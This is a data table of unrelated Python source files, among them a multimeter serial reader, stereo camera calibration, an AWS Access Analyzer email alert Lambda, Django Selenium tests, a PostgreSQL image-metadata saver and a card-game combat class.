text stringlengths 957 885k |
|---|
#!/usr/bin/python
import serial, time
modes=['DC V','AC V','DC uA','DC mA','DC A',
'AC uA','AC mA','AC A','OHM','CAP',
'Hz','Net Hz','Amp Hz','Duty','Net Duty',
'Amp Duty','Width','Net Width','Amp Width','Diode',
'Continuity','hFE','Logic','dBm','EF','Temperature']
segs={ 0x00: ' ',
0x20: '-',
0xd7: '0',
0x50: '1',
0xb5: '2',
0xf1: '3',
0x72: '4',
0xe3: '5',
0xe7: '6',
0x51: '7',
0xf7: '8',
0xf3: '9',
0x87: 'C',
0xa7: 'E',
0x27: 'F',
0x86: 'L',
0x66: 'h',
0x64: 'n',
0x37: 'P',
0x24: 'r',
0xa6: 't'}
byte1=['Hz','Ohms','K','M','F','A','V','m']
byte2=['u','n','dBm','S','%','hFE','REL','MIN']
byte7=['Beep','Diode','Bat','Hold','-','~','RS232','Auto']
decimal=0x08
class ChecksumError(Exception): pass
class LengthError(Exception): pass
class Packet:
def __init__(self):
self.string=''
self.unit=''
self.value=None
self.mode=None
def load_data(self,data):
self.data=[ord(x) for x in data]
if len(data) != 9:
#print "length",len(data)
raise LengthError
checksum=0xff&(57+sum(self.data[:8]))
if checksum != self.data[8]:
raise ChecksumError
self.mode=modes[self.data[0]]
atts=[]
for bit in range(8):
if self.data[1] & (1<<bit): atts.append(byte1[7-bit])
if self.data[2] & (1<<bit): atts.append(byte2[7-bit])
if self.data[7] & (1<<bit): atts.append(byte7[7-bit])
mult = [x for x in ['M','K','m','u','n'] if x in atts]
if len(mult) > 1: raise
mult=(mult+[' '])[0]
unit = [x for x in ['Hz','Ohms','F','A','V',
'dBm','S','%','hFE',
'Beep','Diode'] if x in atts]
if len(unit) > 1: raise
unit=(unit+[''])[0]
self.unit=mult+unit
self.atts=atts
string=''
for d in self.data[3:7]:
string=segs[d & ~decimal]+string
if (d & decimal):
string="."+string
try:
self.value=float(string) * {'M':1e6,
'K':1e3,
' ':1,
'm':1e-3,
'u':1e-6,
'n':1e-9,
'p':1e-12}[mult]
except ValueError:
self.value=None
if '-' in atts:
string='-'+string
self.value=-self.value
self.string=string
def __repr__(self):
return "%s %s"%(self.string,self.unit) #self.value)
def __nonzero__(self):
return None!=self.mode
class RSMeter:
def __init__(self, port='/dev/ttyPROLIFIC'):
self.s=serial.Serial(port=port, timeout=0.1, baudrate=4800)
self.s.setDTR()
self.s.setRTS(0)
self.packet=None
def flush(self):
self.s.flushInput()
def try_for_packet(self):
""" May return a None packet"""
d=self.s.read(9)
if len(d)<9: return False
#if len(d): print "read %d bytes"%len(d)
p=Packet()
while 1:
if len(d)>18: return False
try:
p.load_data(d[-9:])
return p
except ChecksumError:
d=d+self.s.read(1)
except LengthError:
return False
else:
return False
def get_packet(self):
while 1:
p=self.try_for_packet()
if p: return p
def stop_meter_loop(self): pass # for threaded compat
import threading
class RSMeterThreaded(RSMeter):
def __init__(self,port='/dev/ttyS0'):
RSMeter.__init__(self,port)
self.reading_lock=threading.Lock()
self.start_meter_loop()
self.packet=None
def run_meter_loop(self):
while self.meter_loop_running:
for i in range(5):
p=self.try_for_packet()
if p: break
#print p
self.reading_lock.acquire()
self.packet=p
self.reading_lock.release()
def stop_meter_loop(self):
self.meter_loop_running=False
self.meter_loop.join()
def start_meter_loop(self):
self.meter_loop_running=True
self.meter_loop=threading.Thread(target=self.run_meter_loop)
self.meter_loop.start()
def get_packet(self):
self.reading_lock.acquire()
p=self.packet
self.reading_lock.release()
return p
import time,sys
if __name__=="__main__":
try:
meter=RSMeter(sys.argv[1])
except IndexError:
meter=RSMeter()
try:
while 1:
p=meter.get_packet()
if p and None != p.value:
print p.value
time.sleep(1)
except KeyboardInterrupt:
print "interrupt!"
meter.stop_meter_loop()
|
import numpy as np
def get_boxsize(num_corners, num_pixel=63):
factors = np.array([0.3, 0.22, 0.16])
size = int(num_pixel * factors[num_corners - 2])
return size
def select_box(rms, sensitivity=1e-6):
for arr in rms:
arr[arr > sensitivity] = 0
rms_boxes = rms.astype(bool).sum(axis=0)
return rms_boxes
def compute_rms(batch, size):
rms1 = rms2 = rms3 = rms4 = np.ones(len(batch)) * -1
rms1 = np.sqrt((batch[:, :size, :size].reshape(-1, size ** 2) ** 2).mean(axis=1))
rms2 = np.sqrt((batch[:, :size, -size:].reshape(-1, size ** 2) ** 2).mean(axis=1))
rms3 = np.sqrt((batch[:, -size:, :size].reshape(-1, size ** 2) ** 2).mean(axis=1))
rms4 = np.sqrt((batch[:, -size:, -size:].reshape(-1, size ** 2) ** 2).mean(axis=1))
return np.stack([rms1, rms2, rms3, rms4], axis=0)
def get_rms(ifft_truth, ifft_pred):
rms_4_truth = compute_rms(ifft_truth, get_boxsize(4))
rms_boxes = select_box(rms_4_truth, 1e-6)
rms_3_truth = compute_rms(ifft_truth, get_boxsize(3))
select_box(rms_3_truth)
rms_2_truth = compute_rms(ifft_truth, get_boxsize(2))
select_box(rms_2_truth)
rms_4_pred = compute_rms(ifft_pred, get_boxsize(4))
rms_3_pred = compute_rms(ifft_pred, get_boxsize(3))
rms_2_pred = compute_rms(ifft_pred, get_boxsize(2))
rms_3_pred[rms_3_truth == 0] = 0
rms_2_pred[rms_2_truth == 0] = 0
rms_truth = np.zeros(len(rms_boxes))
rms_truth[rms_boxes == 4] = (
np.sqrt(rms_4_truth[0:4, rms_boxes == 4] ** 2).sum(axis=0) / 4
)
rms_truth[rms_boxes == 3] = (
np.sqrt(rms_3_truth[0:4, rms_boxes == 3] ** 2).sum(axis=0) / 3
)
rms_truth[rms_boxes == 2] = (
np.sqrt(rms_2_truth[0:4, rms_boxes == 2] ** 2).sum(axis=0) / 2
)
rms_pred = np.zeros(len(rms_boxes))
rms_pred[rms_boxes == 4] = (
np.sqrt(rms_4_pred[0:4, rms_boxes == 4] ** 2).sum(axis=0) / 4
)
rms_pred[rms_boxes == 3] = (
np.sqrt(rms_3_pred[0:4, rms_boxes == 3] ** 2).sum(axis=0) / 3
)
rms_pred[rms_boxes == 2] = (
np.sqrt(rms_2_pred[0:4, rms_boxes == 2] ** 2).sum(axis=0) / 2
)
corners = np.ones((rms_4_truth.shape[-1], 4))
corners[rms_4_truth.swapaxes(1, 0) == 0] = 0
return rms_truth, rms_pred, rms_boxes, corners
def calc_dr(ifft_truth, ifft_pred):
rms_truth, rms_pred, rms_boxes, corners = get_rms(ifft_truth, ifft_pred)
peak_vals_truth = ifft_truth.reshape(-1, ifft_truth.shape[-1] ** 2).max(axis=1)
peak_vals_pred = ifft_pred.reshape(-1, ifft_pred.shape[-1] ** 2).max(axis=1)
dr_truth = peak_vals_truth / rms_truth
dr_pred = peak_vals_pred / rms_pred
return dr_truth, dr_pred, rms_boxes, corners
|
#!/usr/bin/env python
# coding: utf-8
import cv2
import numpy as np
import matplotlib.pyplot as plt
import glob
import re
def cameraCalibrate(img_names, board_shape, visualize=False, visualize_shape=(4, 4)):
# generate object points and calibrate camera
bw, bh = board_shape
x = np.arange(bw)
y = np.arange(bh)
yy, xx = np.meshgrid(y, x)
obj_points = np.stack([xx, yy, np.zeros_like(xx)], axis=2)
obj_points = obj_points.reshape(-1, 1, 3).astype(np.float32)
w, h, _ = cv2.imread(img_names[0]).shape
# get all image corner pts
img_pts = list()
obj_pts = list()
plt.title('single camera cornert detection')
# plt.figure(figsize=(20, 20))
for i, img_name in enumerate(img_names):
img_data = cv2.imread(img_name)
flag, corner_pts = cv2.findChessboardCorners(img_data, (bh, bw))
if i + 1 <= visualize_shape[0] * visualize_shape[1]:
plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
plt.imshow(img_data)
if not flag: continue
for i in range(9):
plt.scatter(corner_pts[i * 5: (i + 1) * 5, 0, 0], corner_pts[i * 5: (i + 1) * 5, 0, 1], marker='^', linewidths=0.1)
img_pts.append(corner_pts)
obj_pts.append(obj_points)
plt.show()
ret_val, matrix, dist_coff, rvec, tvec = cv2.calibrateCamera(np.array(obj_pts), np.array(img_pts), (w, h), None, None)
plt.title('single camera calibration')
# plot undistorted images with detected points
for i, img_name in enumerate(img_names):
img_data = cv2.imread(img_name)
new_matrix, roi = cv2.getOptimalNewCameraMatrix(matrix, dist_coff, (w, h), 0, (w, h))
undistored_image = cv2.undistort(img_data, matrix, dist_coff, new_matrix)
plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
plt.imshow(undistored_image)
plt.show()
return ret_val, matrix, dist_coff, img_pts, obj_pts, w, h
def binocularCameraCalibrate(left_imgs, right_imgs, board_shape, visualize=False, visualize_shape=(4,4)):
# check number consistency
for left_name, right_name in zip(left_imgs, right_imgs):
assert re.findall(r'd+', left_name) == re.findall(r'd+', right_name), f"{left_name}, {right_name} not consistent!"
# calibrate single camera
errleft, ml, dl, img_ptsl, obj_pts, w, h = cameraCalibrate(left_imgs, board_shape, visualize, visualize_shape)
errright, mr, dr, img_ptsr, _, _, _ = cameraCalibrate(right_imgs, board_shape, visualize, visualize_shape)
# calibrate binocular camera
err, ml, dl, mr, dr, R, T, E, F = cv2.stereoCalibrate(obj_pts, img_ptsl, img_ptsr, ml, dl, mr, dr, (w, h), flags=cv2.CALIB_FIX_INTRINSIC)
# stereo rectify
Rl, Rr, Pl, Pr, Q, Roil, Roir = cv2.stereoRectify(ml, dl, mr, dr, (w, h), R, T)
lmapx, lmapy = cv2.initUndistortRectifyMap(ml, dl, Rl, Pl[:,:3], (w, h), cv2.CV_32FC1)
rmapx, rmapy = cv2.initUndistortRectifyMap(mr, dr, Rr, Pr[:,:3], (w, h), cv2.CV_32FC1)
plt.figure(figsize=(10, 10), dpi=100)
for i, img_pair in enumerate(zip(left_imgs, right_imgs)):
left_img, right_img = cv2.imread(img_pair[0]), cv2.imread(img_pair[1])
nleft = cv2.remap(left_img, lmapx, lmapy, cv2.INTER_LINEAR)
nright = cv2.remap(right_img, rmapx, rmapy, cv2.INTER_LINEAR)
# concat image
full_img = cv2.hconcat([nleft, nright])
h, w, _ = full_img.shape
plt.subplot(visualize_shape[0], visualize_shape[1], i + 1)
plt.imshow(full_img)
# plot line
for i in range(0, h, 50):
plt.plot([0, w-1], [i, i], linewidth=0.5)
plt.show()
return ml, dl,mr, dr, R, T
if __name__ == '__main__':
left_imgs = sorted(glob.glob('imgs/left/*.jpg'))[:4]
right_imgs = sorted(glob.glob('imgs/right/*.jpg'))[:4]
cam_ml, dist_l, cam_mr, dist_r, R, T = binocularCameraCalibrate(left_imgs, right_imgs, (7, 5), True,(2, 2))
|
<gh_stars>1-10
import boto3
from botocore.exceptions import ClientError
import json
import os
import datetime
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import logging
logger = logging.getLogger()
if os.environ['DEBUG'] == "True":
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def handler(event, context):
logger.debug("Received event: " + json.dumps(event, sort_keys=True))
message = json.loads(event['Records'][0]['Sns']['Message'])
logger.info("Received message: " + json.dumps(message, sort_keys=True))
# Structure of the Finding
# {
# "version": "0",
# "id": "081668c3-90e7-a9ca-f284-9cb4b2396a4d",
# "detail-type": "Access Analyzer Finding",
# "source": "aws.access-analyzer",
# "account": "012345678901",
# "time": "2019-12-07T17:36:45Z",
# "region": "us-east-1",
# "resources": [
# "arn:aws:access-analyzer:us-east-1:012345678901:analyzer/aws-iam-access-alerter"
# ],
# "detail": {
# "version": "1.0",
# "id": "b1087d63-331c-4433-84f2-a973c7ae1313",
# "status": "ACTIVE",
# "resourceType": "AWS::IAM::Role",
# "resource": "arn:aws:iam::012345678901:role/fnord",
# "createdAt": "2019-12-07T17:36:42Z",
# "analyzedAt": "2019-12-07T17:36:42Z",
# "updatedAt": "2019-12-07T17:36:42Z",
# "accountId": "012345678901",
# "region": "us-east-1",
# "principal": {
# "AWS": "987654321098"
# },
# "action": [
# "sts:AssumeRole"
# ],
# "condition": {},
# "isDeleted": false,
# "isPublic": false
# }
# }
finding = message['detail']
if finding['status'] != "ACTIVE":
logger.debug(f"Finding is of status: {finding['status']}")
return(event)
if 'error' in finding and finding['error'] == "ACCESS_DENIED":
logger.debug(f"Unable to access resource {finding['resource']}")
return(event)
try:
iam_client = boto3.client('iam')
response = iam_client.list_account_aliases()
if 'AccountAliases' in response and len(response['AccountAliases']) > 0:
account_alias = response['AccountAliases'][0]
account_desc = f"{account_alias}({finding['accountId']})"
else:
account_alias = None
account_desc = f"{finding['accountId']}"
# Make some notes based on attributes of the finding
if finding['isPublic']:
subject = f"New Public Resource found in {account_desc}"
intro = f"A New Public Resource has been discovered in your account {account_desc}:"
explanation = "This resource can be accessed by anyone on the Internet"
elif finding['resourceType'] == "AWS::IAM::Role" and 'Federated' in finding['principal']:
subject = f"New SAML Federation found in {account_desc}"
intro = f"A New SAML Federation has been discovered in {account_desc}: "
explanation = "Make sure the identity provider noted above as the Trusted Entity belongs to your organization and has appropriate security controls in place."
elif finding['resourceType'] == "AWS::IAM::Role":
subject = f"New cross-account role found in {account_desc}"
intro = f"A New cross-account role has been discovered in {account_desc}: "
explanation = "The trusted entity above has permissions to perform actions in your account. You should validate that account's identity and perform a risk-assessment on it. \n Note: The actions that can be performed are not reported by the IAM Access Analyzer and should be inspected for least privilege."
elif 'AWS' in finding['principal'] and finding['principal']['AWS'] == "*":
subject = f"New un-authenticated resource found in {account_desc}"
intro = f"A New resource has been discovered in {account_desc} that does not require IAM Authentication: "
explanation = "The above resource does not require AWS IAM Authentication to access. All security measures rely on the conditions noted above"
else:
subject = f"New Resource trust found in {account_desc}"
intro = f"A New Trust has been discovered in your account {account_desc}: "
explanation = "The above resource is accessible to the Trusted Entity for the actions noted above"
# Show account number of * if that's the trust, otherwise the entire principal in json.
if 'AWS' in finding['principal']:
trusted_entity = finding['principal']['AWS']
else:
trusted_entity = finding['principal']
# Create a message body
txt_body = f"""{intro}
Resource: {finding['resource']}
Type: {finding['resourceType']}
Region: {finding['region']}
Trusted Entity: {trusted_entity}
Actions: {json.dumps(finding['action'], sort_keys=True)}
Conditions: {finding['condition']}
{explanation}
"""
html_body = f"""{intro}<p>
<b>Resource:</b> {finding['resource']}<br>
<b>Type:</b> {finding['resourceType']}<br>
<b>Region:</b> {finding['region']}<br>
<b>Trusted Entity:</b> {trusted_entity}<br>
<b>Actions:</b> {json.dumps(finding['action'], sort_keys=True)}<br>
<b>Conditions:</b> {finding['condition']}<br>
<p>
{explanation}
"""
logger.info(f"Subject: {subject}\n Body: {txt_body}")
send_email(subject, txt_body, html_body)
return(event)
except ClientError as e:
logger.critical("AWS Error getting info: {}".format(e))
raise
except Exception as e:
logger.critical("{}".format(e))
raise
def send_email(subject, txt_body, html_body):
# Always send emails via us-east-1 where SES is available and configured
ses_client = boto3.client('ses', region_name='us-east-1')
message = MIMEMultipart()
message['From'] = os.environ['EMAIL_FROM']
message['To'] = os.environ['EMAIL_TO']
message['Subject'] = subject
body = MIMEMultipart('alternative')
body.attach(MIMEText(txt_body, 'plain')) # Text body of the email
body.attach(MIMEText(html_body, 'html')) # HTML body of the email
message.attach(body)
logger.info("Sending email to {}".format(message['To']))
response = ses_client.send_raw_email(
Source=message['From'],
RawMessage={
'Data': message.as_string(),
})
### END OF CODE ###
|
import pytest
from django.urls import reverse
from garden.formatters import WateringStationFormatter
from garden.utils import build_duration_string
from selenium.common.exceptions import InvalidElementStateException
from tests.assertions import assert_image_files_equal
from .base import Base, wait_for
from .pages.garden_detail_page import GardenDetailPage
from .pages.garden_list_page import GardenListPage
from .pages.garden_update_page import GardenUpdatePage
from .pages.watering_station_detail_page import WateringStationDetailPage
from .pages.watering_station_update_page import WateringStationUpdatePage
class TestGardenModification(Base):
@pytest.fixture(autouse=True)
def setup(self, user_factory, garden_factory, test_password, live_server, use_tmp_static_dir):
self.email = '<EMAIL>'
self.user = user_factory(email=self.email, password=<PASSWORD>)
self.num_watering_stations = 10
self.garden = garden_factory(owner=self.user,
watering_stations=self.num_watering_stations,
watering_stations__defaults=True)
self.url = live_server.url + reverse('garden-detail', kwargs={'pk': self.garden.pk})
self.create_authenticated_session(self.user, live_server)
@pytest.mark.django_db
def test_a_user_can_modify_their_garden(self):
self.driver.get(self.url)
garden_page = GardenDetailPage(self.driver)
self.wait_for_page_to_be_loaded(garden_page)
# the user clicks the edit button and is taken to update garden page
garden_page.edit_button.click()
update_gpage = GardenUpdatePage(self.driver)
self.wait_for_page_to_be_loaded(update_gpage)
# the user sees a form that lets them change the name of the garden, upload a different picture for the garden,
# and delete the garden. They enter invalid data and try to submit the form, but they see errors.
update_gpage.update_garden(update_frequency=-1)
self.wait_for_form_error('error_1_id_update_frequency')
# they then enter valid information and submit the form
new_garden_name = 'My new garden name'
new_garden_image = 'test_garden_image.png'
new_update_frequency = '10:00'
update_gpage.update_garden(
submit=False,
name=new_garden_name,
update_frequency=new_update_frequency,
image=new_garden_image
)
self.perform_image_crop(update_gpage, new_garden_image)
update_gpage.submit_button.click()
# the user then tries to edit the api key field but fails. Instead they click the Reset button near it
# and it changes
orig_key = str(update_gpage.api_key)
try:
update_gpage.api_key = 'aioufhaiulfhaofjsoieg'
except InvalidElementStateException:
pass
else:
pytest.fail('User should not be able to manually update API Key')
update_gpage.reset_api_key_button.click()
assert wait_for(lambda: '*' not in str(update_gpage.api_key))
assert update_gpage.api_key != orig_key
# goes back to the garden detail page where they see the new name and image
update_gpage.garden_detail_nav_button.click()
self.wait_for_page_to_be_loaded(garden_page)
assert garden_page.get_garden_name() == new_garden_name
assert_image_files_equal(garden_page.get_garden_image_src(), new_garden_image)
# the user the clicks edit again and is taken back to the update garden page, where they see their new data
# prefilled in the form
garden_page.edit_button.click()
self.wait_for_page_to_be_loaded(update_gpage)
update_gpage.assert_form_has_values(
name=new_garden_name, update_frequency=new_update_frequency, image=new_garden_image)
# the user then deletes the garden
self.perform_delete_modal_checks(update_gpage)
# they are then redirected back to the garden list page where they see no gardens
list_gpage = GardenListPage(self.driver)
self.wait_for_page_to_be_loaded(list_gpage)
assert list_gpage.get_number_of_gardens() == 0
@pytest.mark.django_db
def test_user_can_modify_their_gardens_watering_stations(self):
# a user goes to a garden detail page
self.driver.get(self.url)
garden_page = GardenDetailPage(self.driver)
self.wait_for_page_to_be_loaded(garden_page)
# the user sees information about the garden
self.garden.refresh_from_db()
assert garden_page.is_displaying_info_for_garden(self.garden)
# they see a table, where each row corresponds to a watering station in the garden and the header of the table
# displays the field names of the watering_stations
self.assert_watering_station_table_contains_correct_headers(garden_page)
# the user also notices that the row display some information about the watering station
selected_watering_station = 1
watering_station = self.garden.get_watering_station_at_idx(selected_watering_station - 1)
assert garden_page.is_table_row_displaying_data_for_watering_station(
selected_watering_station, watering_station)
# they click a watering station link and are taken to the watering station detail page.
garden_page.watering_station = selected_watering_station
detail_ws_page = WateringStationDetailPage(self.driver)
self.wait_for_page_to_be_loaded(detail_ws_page)
# the user sees that the watering station has the same information as on the table in the previous page
assert detail_ws_page.is_displaying_data_for_watering_station(watering_station)
# they see an edit button on the page and click it.
detail_ws_page.edit_button.click()
# they are taken to a page with a form that allows them to edit the configurations of the watering station.
# The user notices that the values in the form are from the same watering station
update_ws_page = WateringStationUpdatePage(self.driver)
self.wait_for_page_to_be_loaded(update_ws_page)
assert update_ws_page.form_has_values_from_watering_station(watering_station)
# the user tries to enter invalid info, but the form renders errors
moisture_threshold = -1
watering_duration = -1
update_ws_page.update_info(
moisture_threshold=moisture_threshold,
watering_duration=watering_duration
)
self.wait_for_form_error('error_1_id_moisture_threshold')
self.wait_for_form_error('error_1_id_watering_duration')
# the user then changes these values and submits the form
ws_status = not watering_station.status
plant_type = 'lettuce'
moisture_threshold = '80'
watering_duration = build_duration_string(minutes=10, seconds=2)
image = 'test_lettuce_image.png'
update_ws_page.update_info(ws_status, plant_type, moisture_threshold,
watering_duration, image, self.perform_image_crop)
watering_station.refresh_from_db()
# they then go back to the garden detail view and sees that the changes have been persisted in the table
update_ws_page.garden_detail_nav_button.click()
self.wait_for_page_to_be_loaded(garden_page)
assert garden_page.is_table_row_displaying_data_for_watering_station(
selected_watering_station, watering_station)
# the user then selects a different watering station page
garden_page.watering_station = selected_watering_station + 1
self.wait_for_page_to_be_loaded(detail_ws_page)
# they then use the navbar to go directly to the watering station that they had edited and see that their
# configurations have persisted on both the detail and update pages
update_ws_page.go_to_watering_station_page(selected_watering_station)
detail_ws_page.is_displaying_data_for_watering_station(watering_station)
detail_ws_page.edit_button.click()
assert update_ws_page.form_has_values_from_watering_station(watering_station)
# the user then goes back to the garden detail page
update_ws_page.garden_detail_nav_button.click()
self.wait_for_page_to_be_loaded(garden_page)
# the user then clicks the deactivate all button and all watering stations in the table are deactivated
garden_page.deactivate_button.click()
for i in range(1, self.num_watering_stations):
status = garden_page.get_watering_station_field_value(i, 'Status')
assert not self.ws_status_to_bool(status)
# the user then clicks the activate all button and all watering statios in the table are activated
garden_page.activate_button.click()
for i in range(1, self.num_watering_stations):
status = garden_page.get_watering_station_field_value(i, 'Status')
assert self.ws_status_to_bool(status)
# the user then goes to watering_station page and deletes the watering station
garden_page.watering_station = selected_watering_station + 1
self.wait_for_page_to_be_loaded(detail_ws_page)
detail_ws_page.edit_button.click()
self.wait_for_page_to_be_loaded(update_ws_page)
self.perform_delete_modal_checks(update_ws_page)
# They are then redirected back to the garden detail page, where they see 1 less watering station
self.wait_for_page_to_be_loaded(garden_page)
assert garden_page.get_number_watering_stations() == self.num_watering_stations - 1
def assert_watering_station_table_contains_correct_headers(self, garden_page):
assert garden_page.get_number_watering_stations() == self.garden.watering_stations.count()
assert garden_page.field_is_in_watering_station_table('#')
assert garden_page.field_is_in_watering_station_table('Status')
assert garden_page.field_is_in_watering_station_table('Plant Type')
assert garden_page.field_is_in_watering_station_table('Moisture Threshold')
assert garden_page.field_is_in_watering_station_table('Watering Duration')
def perform_delete_modal_checks(self, page):
# the user clicks the delete button on the page. They see a modal pop up asking them to confirm their decision.
page.delete_button.click()
self.wait_for_modal_to_be_visible(page.modal_id)
# the user decides not to delete the watering station and clicks cancel and the modal disappears. They then
# quickly change their mind and proceed to delete the watering station.
page.cancel_button.click()
self.wait_for_model_to_disappear(page.modal_id)
page.delete_button.click()
self.wait_for_modal_to_be_visible(page.modal_id)
page.confirm_delete_button.click()
def ws_status_to_bool(self, status):
return True if status == WateringStationFormatter.ACTIVE_STATUS_STR else False
|
#
from modules import ilmodule
import time
import uuid
import json
import os
import psycopg2
import psycopg2.extras
from psycopg2 import pool
import globals
#
# Module for saving data to database
#
class Database(ilmodule.ILModule):
def __init__(self):
super().__init__()
minConnection = 1
maxConnection = 2
self.connectionPool = psycopg2.pool.ThreadedConnectionPool(
minConnection,
maxConnection,
user=os.getenv("PGUSER"),
password=<PASSWORD>("<PASSWORD>"),
host=os.getenv("PGHOST"),
port=os.getenv("PGPORT"),
database=os.getenv("PGDATABASE"),
)
if self.connectionPool:
print("DB Connection pool created successfully")
# By default DO NOT save DUPLICATES!
self.saveDuplicateImageData = False
self.getMessageBus().subscribe(self.onMessage, globals.TOPIC_SAVEDB)
def onMessage(self, arg):
self.getLogger().debug("Received database save request")
self.saveImageData(arg)
# self.getMessageBus().sendMessage(globals.TOPIC_???????, arg=metadata)
#
# Save image metadata to PostgreSQL database
#
def saveImageData(self, imageDataJSON):
dbConnection = self.connectionPool.getconn()
try:
dbCursor = dbConnection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
# Delete old data, if exists
imageSha256 = imageDataJSON["hash"]
if not self.saveDuplicateImageData:
dbCursor.execute(
"DELETE FROM image_lib WHERE left(filehash, 2)=%s AND filehash=%s",
(imageSha256[:2], imageSha256),
)
if "GPSLatitude" in imageDataJSON["gps"] and imageDataJSON["gps"]["GPSLatitude"]:
GPSLatitude = imageDataJSON["gps"]["GPSLatitude"]
else:
GPSLatitude = None
if "GPSLongitude" in imageDataJSON["gps"] and imageDataJSON["gps"]["GPSLongitude"]:
GPSLongitude = imageDataJSON["gps"]["GPSLongitude"]
else:
GPSLongitude = None
address = {}
if "address" in imageDataJSON:
address = imageDataJSON["address"]
display_name = ""
if "display_name" in imageDataJSON:
display_name = imageDataJSON["display_name"]
thumbnailBytes = self.get_bytes_from_file(imageDataJSON["thumbnail_path"])
originalname = os.path.basename(imageDataJSON["image_path"])
fullDate = None
if imageDataJSON["dateOfImage"]:
d = time.strptime(imageDataJSON["dateOfImage"], "%Y:%m:%d %H:%M:%S")
fullDate = time.strftime('%Y-%m-%d %H:%M:%S', d)
imageYear = None
imageMonth = None
imageDay = None
# Generate GUID for DB record
guid = uuid.uuid1()
dbCursor.execute(
"INSERT INTO image_lib (guid, filehash, gpsdata, exifdata, latitude, longitude, address, address_full, faces, tags, originalname, description, thumbnail, imagedate, taken_at, imageyear, imagemonth, imageday) VALUES ("
"%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
(
str(guid),
str(imageSha256),
json.dumps(imageDataJSON["gps"]),
json.dumps(imageDataJSON["EXIF"]),
GPSLatitude,
GPSLongitude,
json.dumps(address),
display_name,
json.dumps(imageDataJSON["faces"]),
json.dumps(imageDataJSON["tags"]),
originalname,
imageDataJSON["description"],
thumbnailBytes,
fullDate,
fullDate,
imageYear,
imageMonth,
imageDay,
),
)
dbConnection.commit()
dbCursor.close()
print("Data saved with GUID: " + str(guid))
except Exception as e:
dbConnection.rollback()
# log.error("{} error: {}".format(func.__name__, e))
print(e)
# Throw exception to caller
raise e
finally:
self.connectionPool.putconn(dbConnection)
return |
# -*- coding: UTF-8 -*-
def transfer_image_coordinate_to_display(pt, image_size, display_size, display_orientation):
"""
功能:图像坐标系到屏幕坐标系转换,屏幕坐标系的原点会随着屏幕旋转而变化
输入:目标点的图像坐标,(图像宽,图像高),(视图宽,视图高),视图方向(0,1,2,3)
输出:目标点的屏幕坐标
"""
percent_x = 1.0 * pt[0] / image_size[0]
percent_y = 1.0 * pt[1] / image_size[1]
if display_orientation == 0:
return (percent_x * display_size[0], percent_y * display_size[1])
elif display_orientation == 1:
return (percent_y * display_size[0], display_size[1] - percent_x * display_size[1])
elif display_orientation == 2: # untested
return (display_size[0] - percent_x * display_size[0], display_size[1] - percent_y * display_size[1])
else: # (display_orientation==3)
return (display_size[0] - percent_y * display_size[0], percent_x * display_size[1])
def transfer_display_coordinate_to_image(pt, display_size , display_orientation ,image_size):
"""
功能:屏幕坐标系到图像坐标系转换,屏幕坐标系的原点会随着屏幕旋转而变化
输入:目标点的屏幕坐标,(视图宽,视图高),视图方向(0,1,2,3),(图像宽,图像高)
输出:目标点的图像坐标
"""
percent_x = 1.0 * pt[0] / display_size[0]
percent_y = 1.0 * pt[1] / display_size[1]
if display_orientation == 0:
return (percent_x * image_size[0], percent_y * image_size[1])
elif display_orientation == 1:
return (image_size[0]-percent_y * image_size[0], percent_x*image_size[1])
elif display_orientation == 2: # untested
return (image_size[0] - percent_x * image_size[0], image_size[1] - percent_y * image_size[1])
else: # (display_orientation==3)
return (percent_y * image_size[0],image_size[1] - percent_x * image_size[1] )
def transfer_image_coordinate_list_to_display(pts, image_size, display_size, display_orientation):
"""
功能:图像坐标系到屏幕坐标系转换,屏幕坐标系的原点会随着屏幕旋转而变化
输入:目标点集的图像坐标,(图像宽,图像高),(视图宽,视图高),视图方向(0,1,2,3)
输出:目标点集的屏幕坐标
"""
ret_list = []
for pt in pts:
ret_list.append(transfer_image_coordinate_to_display(pt, image_size, display_size, display_orientation))
return ret_list
def transfer_display_coordinate_list_to_image(pts, display_size, display_orientation, image_size):
"""
功能:屏幕坐标系到图像坐标系转换,屏幕坐标系的原点会随着屏幕旋转而变化
输入:目标点集的屏幕坐标,(视图宽,视图高),视图方向(0,1,2,3),(图像宽,图像高)
输出:目标点集的图像坐标
"""
ret_list = []
for pt in pts:
pt=transfer_display_coordinate_to_image(pt, display_size, display_orientation,image_size)
ret_list.append((int(pt[0]),int(pt[1])))
return ret_list
|
import copy
import logging
import typing
from typing import Optional, List
from hearthstone.events import CombatPhaseContext, EVENTS
from hearthstone.cards import CardEvent
if typing.TYPE_CHECKING:
from hearthstone.player import Player
from hearthstone.randomizer import Randomizer
from hearthstone.cards import Card, MonsterCard
logger = logging.getLogger(__name__)
class WarParty:
# (HalfBoard)
def __init__(self, player: 'Player'):
self.owner = player
self.board = [copy.copy(card) for card in player.in_play]
self.next_attacker_idx = 0
def find_next(self) -> Optional['MonsterCard']:
# Sets the index for the next monster who will fight from your side.
# Must be called after active player monster fights
# Also after a monster dies from combat if it was the active monster
# Take care not to call this function twice after a monster dies fighting
# The final condition indicates a next fighting monster cannot be found
# Meaning the player has lost the round
# Take care to handle the case where both players die in the same monster fight action
num_cards = len(self.board)
for offset in range(0, num_cards):
index = (self.next_attacker_idx + offset) % num_cards
if not self.board[index].dead and not self.board[index].cant_attack:
self.next_attacker_idx = index + 1
return self.board[index]
return None
def get_random_monster(self, randomizer: 'Randomizer') -> Optional['MonsterCard']:
taunt_monsters = [card for card in self.board if not card.dead and card.taunt]
if taunt_monsters:
return randomizer.select_attack_target(taunt_monsters)
all_monsters = [card for card in self.board if not card.dead]
if all_monsters:
return randomizer.select_attack_target(all_monsters)
return None
def num_cards(self):
return len(self.board)
def summon_in_combat(self, monster: 'MonsterCard', context: CombatPhaseContext, index: Optional[int] = None):
live_monsters_num = len([card for card in context.friendly_war_party.board if not card.dead])
max_board_size = context.friendly_war_party.owner.maximum_board_size
if live_monsters_num >= max_board_size:
return
if not index:
index = len(context.friendly_war_party.board)
context.friendly_war_party.board.insert(index, monster)
if index < context.friendly_war_party.next_attacker_idx:
context.friendly_war_party.next_attacker_idx += 1
